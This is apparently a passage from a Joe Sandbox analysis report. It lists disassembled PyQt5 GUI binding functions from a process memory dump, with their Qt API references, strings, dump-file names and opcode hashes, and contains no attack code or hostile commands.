String ID: QTextDocumentWriter$device$device(self) -> Optional[QIODevice]
API String ID: 3459829050-3328926645
Opcode ID: 3805ca1d78a6ad6afb268f5705f77967fe049671baa77cdd46bb60b65a28acfa
Instruction ID: ea6401979f8abe9b3713de51565a2ec8b89c69fe8c8da24e7c163e7d6b82fd36
Opcode Fuzzy Hash: 3805ca1d78a6ad6afb268f5705f77967fe049671baa77cdd46bb60b65a28acfa
Instruction Fuzzy Hash: 8D01EDB5B08A46C1EB109F65E8586A937A8FB55B84F9140B2CD5D43320DF7DD589C740

Function 00007FFB9A2E3C30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?documentLayout@QTextDocument@@QEBAPEAVQAbstractTextDocumentLayout@@XZ.QT5GUI ref: 00007FFB9A2E3C7B

Strings

documentLayout(self) -> Optional[QAbstractTextDocumentLayout], xrefs: 00007FFB9A2E3CA7
documentLayout, xrefs: 00007FFB9A2E3CB3
QTextDocument, xrefs: 00007FFB9A2E3CBA

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?documentAbstractDocumentDocument@@Layout@Layout@@
String ID: QTextDocument$documentLayout$documentLayout(self) -> Optional[QAbstractTextDocumentLayout]
API String ID: 955490804-1570699827
Opcode ID: b045db14b424a919c4a8d009fdd13dc26b6a632c0bb66b79618433d081f56b60
Instruction ID: 067a85131a2681330a957203d286143cf2eaf27a62214266519774e9ec2330e5
Opcode Fuzzy Hash: b045db14b424a919c4a8d009fdd13dc26b6a632c0bb66b79618433d081f56b60
Instruction Fuzzy Hash: CF010CB5B08A56C1EB10DF75E8986A937A8FB95B84FA180B2CE4D43320CF7DD55AC740

Function 00007FFB9A359C80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?compositionMode@QPaintEngineState@@QEBA?AW4CompositionMode@QPainter@@XZ.QT5GUI ref: 00007FFB9A359CCB

Strings

compositionMode, xrefs: 00007FFB9A359CFF
QPaintEngineState, xrefs: 00007FFB9A359D06
compositionMode(self) -> QPainter.CompositionMode, xrefs: 00007FFB9A359CF3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Mode@$?compositionCompositionEnginePaintPainter@@State@@
String ID: QPaintEngineState$compositionMode$compositionMode(self) -> QPainter.CompositionMode
API String ID: 3537439247-1830017387
Opcode ID: 4a64675ec93c58d44ad7d68d798da7b31eb9d6b35ab82323187e7a8f1316018e
Instruction ID: 5d7393cd741e597d5e643c210354cedb5052713cda8c3906b99b5c0713b23359
Opcode Fuzzy Hash: 4a64675ec93c58d44ad7d68d798da7b31eb9d6b35ab82323187e7a8f1316018e
Instruction Fuzzy Hash: B0010CB5B08A46C1EB10CF75E8486A933A8FB95B54FA180B6CE4D43320DFBCD58AC340

Function 00007FFB9A2FFC20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?contentOrientation@QWindow@@QEBA?AW4ScreenOrientation@Qt@@XZ.QT5GUI ref: 00007FFB9A2FFC6B

Strings

QWindow, xrefs: 00007FFB9A2FFCA6
contentOrientation(self) -> Qt.ScreenOrientation, xrefs: 00007FFB9A2FFC93
contentOrientation, xrefs: 00007FFB9A2FFC9F

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Orientation@$?contentQt@@ScreenWindow@@
String ID: QWindow$contentOrientation$contentOrientation(self) -> Qt.ScreenOrientation
API String ID: 4268369361-3620501135
Opcode ID: 66f492f330abb709bf033cd9f0e5462c3b516b1d1e8816bf1f1ea02c179bff0c
Instruction ID: 8a5f194679f44a78c5bda076091bec131737a04913ff2c58e7059e8f36dc40c0
Opcode Fuzzy Hash: 66f492f330abb709bf033cd9f0e5462c3b516b1d1e8816bf1f1ea02c179bff0c
Instruction Fuzzy Hash: 3F01E9B5B08A46C1EB50DF75E8486A937A8FB55B84FA140B2CE5D43320DF7CD54AC740

Function 00007FFB9A309B20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?destroy@QWindow@@QEAAXXZ.QT5GUI ref: 00007FFB9A309B6B

Strings

QWindow, xrefs: 00007FFB9A309BA1
destroy(self), xrefs: 00007FFB9A309B8E
destroy, xrefs: 00007FFB9A309B9A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?destroy@Window@@
String ID: QWindow$destroy$destroy(self)
API String ID: 844748944-4162710497
Opcode ID: 71b8c474e7d83c9511029edc268aa47ed0aabb543f69c245889a56d69d8bdab3
Instruction ID: a3691ea23383107e61d780ce9f7d29e188d4418727116616e50e402a18a98791
Opcode Fuzzy Hash: 71b8c474e7d83c9511029edc268aa47ed0aabb543f69c245889a56d69d8bdab3
Instruction Fuzzy Hash: 530100B5A08A56C1EB50DF25E8886A933B8FB95754F9140B2CE5D03330DF7CD54AC740

Function 00007FFB9A2FDC30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?clearSelection@QTextCursor@@QEAAXXZ.QT5GUI ref: 00007FFB9A2FDC7B

Strings

clearSelection(self), xrefs: 00007FFB9A2FDC9E
QTextCursor, xrefs: 00007FFB9A2FDCB1
clearSelection, xrefs: 00007FFB9A2FDCAA

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?clearCursor@@Selection@Text
String ID: QTextCursor$clearSelection$clearSelection(self)
API String ID: 2787548564-4141401258
Opcode ID: 8fa70b060d8bfb87ba1cd1f798a81c2135d1ce5aa4f90e1938bfb10effe50a1a
Instruction ID: fa1e38977142bcb8e64e9023de595ac8c579a6b893495ce327cab53cff82635e
Opcode Fuzzy Hash: 8fa70b060d8bfb87ba1cd1f798a81c2135d1ce5aa4f90e1938bfb10effe50a1a
Instruction Fuzzy Hash: C7010CB5A08F5AC0EB209F65E8886A93778FB55B84F9140B2CA5D43330CF7DD54AC740

Function 00007FFB9A2EDC70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?clear@QStandardItemModel@@QEAAXXZ.QT5GUI ref: 00007FFB9A2EDCBB

Strings

clear(self), xrefs: 00007FFB9A2EDCDE
QStandardItemModel, xrefs: 00007FFB9A2EDCF1
clear, xrefs: 00007FFB9A2EDCEA

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?clear@ItemModel@@Standard
String ID: QStandardItemModel$clear$clear(self)
API String ID: 2297373637-2567132944
Opcode ID: 09d784f04588ed62f861b1aece605f6eed9d2514d2c1e38e2acfe32f11d08d36
Instruction ID: d668956559edd89d35f0ed00aef9a4178af36d863b61bb0a34197f61bddc30e3
Opcode Fuzzy Hash: 09d784f04588ed62f861b1aece605f6eed9d2514d2c1e38e2acfe32f11d08d36
Instruction Fuzzy Hash: 5801EDB5A08B5AC0EB109F65E8486A933A8FB55784F9140B2CA5D13320DF7CD545D740

Function 00007FFB9A2F78C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFB9A2F7914

Strings

QPixelFormat, xrefs: 00007FFB9A2F7939
cyanSize, xrefs: 00007FFB9A2F7932
cyanSize(self) -> int, xrefs: 00007FFB9A2F7926

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QPixelFormat$cyanSize$cyanSize(self) -> int
API String ID: 3417993445-896624002
Opcode ID: ac26d8b08f78d977762e020f5cd82de948b3c7528124f726d0713d96de2e283e
Instruction ID: c8463ab09ae774ac3521aafb38d39aeb1981ae7df3160bfc707da24ff5ee62e7
Opcode Fuzzy Hash: ac26d8b08f78d977762e020f5cd82de948b3c7528124f726d0713d96de2e283e
Instruction Fuzzy Hash: DB014FB5B08B46C1EB10DF60E8486A933A8FB94744FA140B6CA5D13320CF7DD649C340

Function 00007FFB9A2E18F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?endRemoveRows@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFB9A2E193B

Strings

endRemoveRows, xrefs: 00007FFB9A2E196A
endRemoveRows(self), xrefs: 00007FFB9A2E195E
QStandardItemModel, xrefs: 00007FFB9A2E1971

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?endAbstractItemModel@@RemoveRows@
String ID: QStandardItemModel$endRemoveRows$endRemoveRows(self)
API String ID: 2070969689-968815932
Opcode ID: 3b71b633be4ed5ba1b6979656c89c87bcaadba234cd4c1faf94caa980013cec7
Instruction ID: c2e04b865b418c2ebce7990587c73e40092273c11f7dd97452c6e0c62546f7f5
Opcode Fuzzy Hash: 3b71b633be4ed5ba1b6979656c89c87bcaadba234cd4c1faf94caa980013cec7
Instruction Fuzzy Hash: C2010CB5A08A5AC0EB20DF65E8886A937B8FB55B84F9140B2CA5D43320DF7DD55AC740

Function 00007FFB9A2FD980 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?removeSelectedText@QTextCursor@@QEAAXXZ.QT5GUI ref: 00007FFB9A2FD9CB

Strings

removeSelectedText, xrefs: 00007FFB9A2FD9FA
QTextCursor, xrefs: 00007FFB9A2FDA01
removeSelectedText(self), xrefs: 00007FFB9A2FD9EE

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?removeCursor@@SelectedTextText@
String ID: QTextCursor$removeSelectedText$removeSelectedText(self)
API String ID: 4213397164-1153738210
Opcode ID: 2522616458def94d2267eeadd350cbbd06b454ec417ff84629a0ab10b20f820b
Instruction ID: dfab83dd2191138440782914e1c6aefd04dcefa9ea7e6fce28189905f6f75585
Opcode Fuzzy Hash: 2522616458def94d2267eeadd350cbbd06b454ec417ff84629a0ab10b20f820b
Instruction Fuzzy Hash: 420108B5A08B5BC0EB209F65E8886A933B8FB54B88F9141B2CA5D43330DF7DD54AC740

Function 00007FFB9A355C70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A355CC2

Strings

scalar(self) -> float, xrefs: 00007FFB9A355CD4
QQuaternion, xrefs: 00007FFB9A355CE7
scalar, xrefs: 00007FFB9A355CE0

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
